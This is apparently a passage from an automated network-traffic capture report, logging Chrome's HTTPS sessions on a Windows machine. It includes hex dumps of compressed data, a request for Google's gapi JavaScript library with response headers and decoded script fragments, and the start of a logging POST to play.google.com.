2024-09-26 15:41:25 UTC	8000	IN	Data Raw: 78 be 53 f1 de 3f 88 36 2a e2 59 81 bc f0 30 ce 36 a0 0f d6 7b d7 69 21 b6 26 31 b6 8a be 0f 1b fd 6c eb 0c 1f 00 f5 15 c2 00 e8 bf 2e c7 35 00 52 db d7 85 43 18 ff c8 9f 47 31 7f db 58 e3 28 c8 c8 3c e2 2a c5 71 d0 43 85 6c 1c b4 f6 82 2a 8e 8a 9b 89 e3 52 0c 71 4c 09 89 c3 7e 01 c5 91 db 65 18 67 74 e2 00 e9 bf bb 07 1c 20 19 99 d7 d7 87 73 9a e9 4c 85 4e 3e 03 ee f4 e4 d0 32 db 46 29 89 74 cc 87 a6 f5 01 e3 7e a8 5c 06 db 1b e8 ef 20 15 fc 1d 10 f0 ff ce 96 f8 5b 2a fc b5 66 a3 8b 83 80 fc 51 25 b8 38 20 ab b5 34 b1 e8 8b 56 7d 3f bc 1c 56 f7 e7 c1 1a e0 20 fb e1 98 28 4d 4b 14 95 1f 6c 8f a0 31 f8 f2 28 63 f0 dc 58 c6 e0 8e 30 63 70 7b c8 18 dc 42 b6 99 d9 05 70 56 b8 a8 d8 59 62 b1 3d f3 0a 7a 69 55 c0 98 78 c6 61 e7 11 db b3 60 4d d7 78 c6 bb d5 cf Data Ascii: xS?6Y06{i!&1l.5RCG1X(<qClRqL~egt sLN>2F)t~\ [fQ%8 4V}?V (MKl1(cX0cp{BpVYb=ziUxa`Mx
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: d6 11 63 48 74 c5 09 a7 91 44 7a 4c ab e4 f9 60 98 fa df 1f 45 6d 65 fc 40 78 63 af 33 8c cd ca 30 73 b3 82 61 e2 62 2e 33 37 39 c7 70 a9 e4 37 fd 83 52 88 23 9c 7c be 70 37 49 30 1f 24 f9 d8 50 7a 38 3b 37 ab 90 76 5e 1e 84 23 d5 73 f1 72 e3 02 35 5a f5 3a b8 34 cc 63 cc c5 23 b6 9b 63 36 c4 90 70 3c 62 5b c2 c3 a3 1b e1 fc 34 3e af 96 bf c5 0f 05 cf 79 27 5a 08 b0 ff 1d b8 da fc c7 96 4a 9f 0d 4c 9c b0 16 bb 4c 92 cb 9c 2b db dd c8 49 4d 28 84 37 2e 0e 2a e1 e6 58 71 98 1d 86 76 64 a8 fb 39 dc 9d fd db 7a f6 04 9c 50 ac 65 4f 3c 0c e8 25 b1 d2 3c 08 4a 48 e4 a6 e9 3c 69 a7 3b c6 e0 f5 f3 3b b1 98 b5 95 46 74 70 c9 c7 24 88 95 7b 21 26 5b ff 2d 9b 1e 70 2f 40 63 8e a5 9c c0 cc 19 78 c0 f0 be 4c 3c 60 38 75 11 9a 9b 7e 24 66 24 9a f8 f1 36 5e df 4e 9f ca Data Ascii: cHtDzL`Eme@xc30sab.379p7R#\|p7I0$Pz8;7v^#sr5Z:4c#c6p<b[4>y'ZJLL+IM(7.*Xqvd9zPeO<%<JH<i;;Ftp${!&[-p/@cxL<`8u~$f$6^N
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: 52 cd 42 1e af 88 ff da b5 77 2e 4c 2c 14 b8 30 31 87 27 6a c6 72 c9 03 97 70 fe fa ec 44 a5 40 9d b8 c1 87 72 94 e7 da e9 de 79 3e ca 27 05 7f 01 0a 57 91 91 a9 fc 57 94 32 e6 00 a3 08 c5 9a 39 28 d4 cc 91 bc 7c 43 72 84 b9 63 f3 ff f2 96 aa 87 08 ef c4 fd 06 0b a7 ac 04 8e 56 24 1a 82 0a 3f 73 94 07 bf 1f 13 7e 8e ce 6f cb 0d dc 4a 65 b0 30 e4 a4 52 1c c6 6b c8 fe 40 70 73 bd 10 f8 21 54 ab 33 ba 15 93 a4 05 2e a1 de 76 a2 5b 9b 75 c2 6a f6 b3 0e 7f 42 25 f5 d1 92 9a 26 8e bc f9 47 94 50 40 86 ff 79 0e ea 6e 6d 2d 3b 99 2f 79 08 14 2a 69 08 d1 34 43 34 a1 50 c9 ba 50 49 cd 75 db e6 12 39 ff 86 d6 2d 10 5e a3 b5 1b 34 66 06 97 7b f0 96 d3 5a 92 87 66 6d 54 ce cb 46 bd c8 d3 3e c6 9d 7c e1 ea 18 2a e6 fd 92 74 69 5d 75 b0 10 8d 05 9d c4 2b ad 01 bb b9 23 Data Ascii: RBw.L,01'jrpD@ry>'WW29(\|CrcV$?s~oJe0Rk@ps!T3.v[ujB%&GP@ynm-;/yi4C4PPIu9-^4f{ZfmTF>\|ti]u+#
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: d4 e9 fb aa cc ff 23 fa 36 29 b3 13 e8 db 7e 4e f4 6d bf 24 e9 db 7e 49 d1 77 c5 a5 4b e0 f6 8b 47 e0 a7 04 9d c0 ef 12 ce 81 c0 e3 8c 95 9a 3e 47 8c c4 6e 4f d4 98 c7 2b 57 56 d8 d6 fd b3 c0 6e e1 d6 80 a0 be 05 25 45 c2 bd 8c dc ba db 16 44 54 72 ab 4e 5a ea 89 bc 3f 03 c2 de e7 55 a0 21 3f 8a 36 59 e6 3a 25 b9 a2 72 8b 99 85 53 82 99 94 45 2b 9d bf 50 e4 bf 34 5f 20 6d 72 e3 83 25 45 2a 01 e2 9d 4a 5e 91 9e 68 4e 93 e1 48 82 3b d5 0a 3e 00 e7 64 9f 0d 44 cf cf 3e 7b 68 7e 2a fb ec bf cd bf 04 ec b3 ab a2 69 e5 bf 99 9f ca 9e 48 e6 5d 1a f7 23 56 a6 d5 9f bb e7 a5 ea 4f fe bc 8b 6a 1f 55 ed cd 15 23 dc de fc 53 7e 45 6c a9 66 6f 0e 9d b9 2c 3e 63 d2 6c 30 3a 6f fc 57 66 74 6e 75 c2 f5 b0 56 e7 14 b3 f3 c3 f6 34 cc ce 49 ec b3 5f b7 9f 9b 7d f6 8c 2d f5 Data Ascii: #6)~Nm$~IwKG>GnO+WVn%EDTrNZ?U!?6Y:%rSE+P4_ mr%EJ^hNH;>dD>{h~iH]#VOjU#S~Elfo,>cl0:oWftnuV4I_}-
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: ec 11 34 6d 3b ec a6 e8 71 16 52 e4 a7 38 f5 42 ff af 0d 45 1f a0 3a 65 04 0d c0 30 c1 6c 00 c5 9d ab 20 56 97 93 9b 0c eb 20 d6 09 f4 68 92 a6 90 bc 1f a7 64 6d b5 b8 f2 0a a4 2f 84 48 22 1b 5b 80 d7 08 71 c2 50 06 97 6d 0d 90 13 6c 7d b3 a4 63 42 18 29 7d 2b e7 1a e5 1b d4 7e 82 9f ab c3 d5 99 51 80 47 51 72 2c d8 d6 43 ad a9 f5 41 a9 b4 80 56 b3 45 6f bd 43 8a 5c 07 a7 73 81 7b aa f5 e8 22 30 c4 5f 06 ae 5f e4 6a 38 83 46 b2 72 d4 14 2b 84 16 8d ed 90 28 f9 0a 1f 0a 84 f1 89 d3 32 00 47 80 67 74 94 fc 08 b4 4d 58 8d c4 64 43 9a 06 39 cd 1c 0b e5 34 0a 38 89 1d e0 2c 91 30 62 80 01 e5 be 33 6e 5c ac 69 c4 5e 76 dc de 11 07 d9 71 07 5b c0 cc 1f 78 47 35 08 43 a1 1c 3b f0 92 8f db 89 7f 52 1c 7b 88 39 15 d6 fc 15 0c 89 62 4e 31 58 c9 93 8f 55 ce 2a c8 22 Data Ascii: 4m;qR8BE:e0l V hdm/H"[qPml}cB)}+~QGQr,CAVEoC\s{"0__j8Fr+(2GgtMXdC948,0b3n\i^vq[xG5C;R{9bN1XU*"
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: a6 38 64 4d 54 9f 7d 27 c6 eb 2f 9e 3b ab 62 fa 8b 75 cc fe 02 8f 49 c1 82 c9 13 e8 36 ac fc 73 13 a6 e7 d6 d7 8d f4 6c 78 75 24 3d f3 23 66 8f 4e 4f eb 28 fd 05 1e b6 60 a1 6d 6b c9 e4 e0 c2 c9 df 86 c8 6c 3d 41 2f e5 79 68 e8 3e b5 8a 2c 4a 21 d8 77 2a 49 2a 10 be 0c e8 5e 04 44 07 56 8b cd e1 87 3c 49 09 e8 9d de 35 81 fd 9b 2b ba c5 a2 56 19 2d 38 0c 70 be 5e b2 76 f4 0d 9c ca cf 4d 24 ff 59 f1 f9 6b eb c7 70 c3 78 f9 37 4c 24 7f 6b 7c fe da 7a b3 7b f4 fc 89 49 d9 8b d2 14 7c 1e 57 9f 5d ea 13 8f 3b d5 f2 fb c6 2f 5f be 23 5d bf 6c 15 b1 ec be ab 4a 95 2b d1 f7 a6 6d 7a 68 07 0b b0 fe d2 b4 53 8f df ad 87 f6 44 53 a0 e0 a9 e9 90 26 08 6a 7a 4f fd b2 4a 6a 6a 55 6f 61 85 5a 50 ae 23 ff db 4c f5 0e 56 d3 5e 3d 1f bc 70 c2 71 dc d8 56 41 12 dc 3f 7a fc Data Ascii: 8dMT}'/;buI6slxu$=#fNO(`mkl=A/yh>,J!wI^DV<I5+V-8p^vM$Ykpx7L$k\|z{I\|W];/_#]lJ+mzhSDS&jzOJjjUoaZP#LV^=pqVA?z
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: 2f 0e e7 ff 51 b8 5b 14 bf 7c be 11 55 be d3 22 ff 95 c7 c3 e5 db a4 7c 2c 53 d2 b6 51 c8 97 31 5d fc 60 a7 b0 c8 a4 e5 2c 5e 14 73 4c 6b f8 09 08 cf 5e e6 14 6f 9a 16 35 06 4f bf eb 2e 6b ea eb 4f 54 6a 65 22 f1 7f 5e 23 6f 56 d7 2c 2b ad db f9 d8 a1 bb cf 7a 48 c3 09 ac b4 0e d2 fd 01 11 6e 9d 35 9c 5f 86 3b e3 21 8d 32 dc 8b 3c 9c f7 41 23 89 2b 81 0f 78 88 5f e2 8f 0b bc c4 c0 17 02 ef f7 90 56 89 df 2b f0 59 8e d7 4b ce 3a 5e 77 9f d9 fb 79 c2 f8 03 8c 18 30 88 7e 4e e0 dc 65 82 51 a2 fb 78 79 ee b3 e6 97 95 60 42 78 8e 8d fa fa be 41 64 e5 77 d6 ac bc 2a b3 92 60 66 f9 70 ab 08 f7 ac 35 5c 8b 59 34 46 96 5f e1 e1 bc ff 60 64 69 95 2c 12 23 cb 41 81 df 69 e0 8b 64 91 18 59 fe 7b 81 df c8 b2 9c c0 32 78 96 67 30 32 ef 30 f6 50 59 e6 06 be e2 57 fa 77 Data Ascii: /Q[\|U"\|,SQ1]`,^sLk^o5O.kOTje"^#oV,+zHn5_;!2<A#+x_V+YK:^wy0~NeQxy`BxAdw*`fp5\Y4F_`di,#AidY{2xg020PYWw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.17	49727	142.250.184.238	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:26 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:26 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 126135 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 10:43:14 GMT Expires: Fri, 26 Sep 2025 10:43:14 GMT Cache-Control: public, max-age=31536000 Last-Modified: Fri, 06 Sep 2024 22:07:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 17892 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:41:26 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 66 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 75 61 2c 77 61 3b 62 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var ba,fa,ha,na,oa,sa,ua,wa;ba=fun
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 Data Ascii: n a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw E
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 62 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 75 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e Data Ascii: efined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:ba(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ua=typeof Object.assign=="function"?Object.
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 3b 74 68 69 73 2e 51 72 3d 5b 5d 3b 74 68 69 73 2e 6a 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 58 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 56 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 58 64 61 3d 66 75 6e 63 74 69 Data Ascii: ;this.Qr=[];this.jV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Xda),reject:h(this.VJ)}};e.prototype.Xda=functi
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 51 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 51 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 5a 4f 28 74 68 69 73 2e 51 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 51 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 44 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 6c 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 45 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76 65 Data Ascii: totype.G7=function(){if(this.Qr!=null){for(var h=0;h<this.Qr.length;++h)f.ZO(this.Qr[h]);this.Qr=null}};var f=new b;e.prototype.Dfa=function(h){var k=this.jF();h.ly(k.resolve,k.reject)};e.prototype.Efa=function(h,k){var l=this.jF();try{h.call(k,l.resolve
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d 7d Data Ascii: egular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}}
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 73 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 Data Ascii: his.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&sa(l,f)?l[f][this.Ga]:void 0};k.prototype.has=function(l){return c(l)&&
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 74 2c 6b 2e 65 66 2e 6e 65 78 74 2e 55 6b 3d 0a 6b 2e 65 66 2e 55 6b 2c 6b 2e 65 66 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 55 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 65 66 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 65 66 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: t,k.ef.next.Uk=k.ef.Uk,k.ef.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Uk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).ef};c.prototype.get=function(k){return(k=d(this,k).ef)&&k.value};c.prototy
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 Data Ascii: ize!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)return!1;f=e.next();return f.done\|\|f.value[0]==c\|\|f.value[0].x!=4\|\|f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var
2024-09-26 15:41:26 UTC	1390	IN	Data Raw: 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6e 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 Data Ascii: 4111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e):(e-=65536,c+=String.fromCharCode(e>>>10&1023\|55296),c+=String.fromCharCode(e&1023\|56320))}return c}});na("Array.prototype.entries",function(a){return

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.17	49729	142.250.186.110	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:27 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
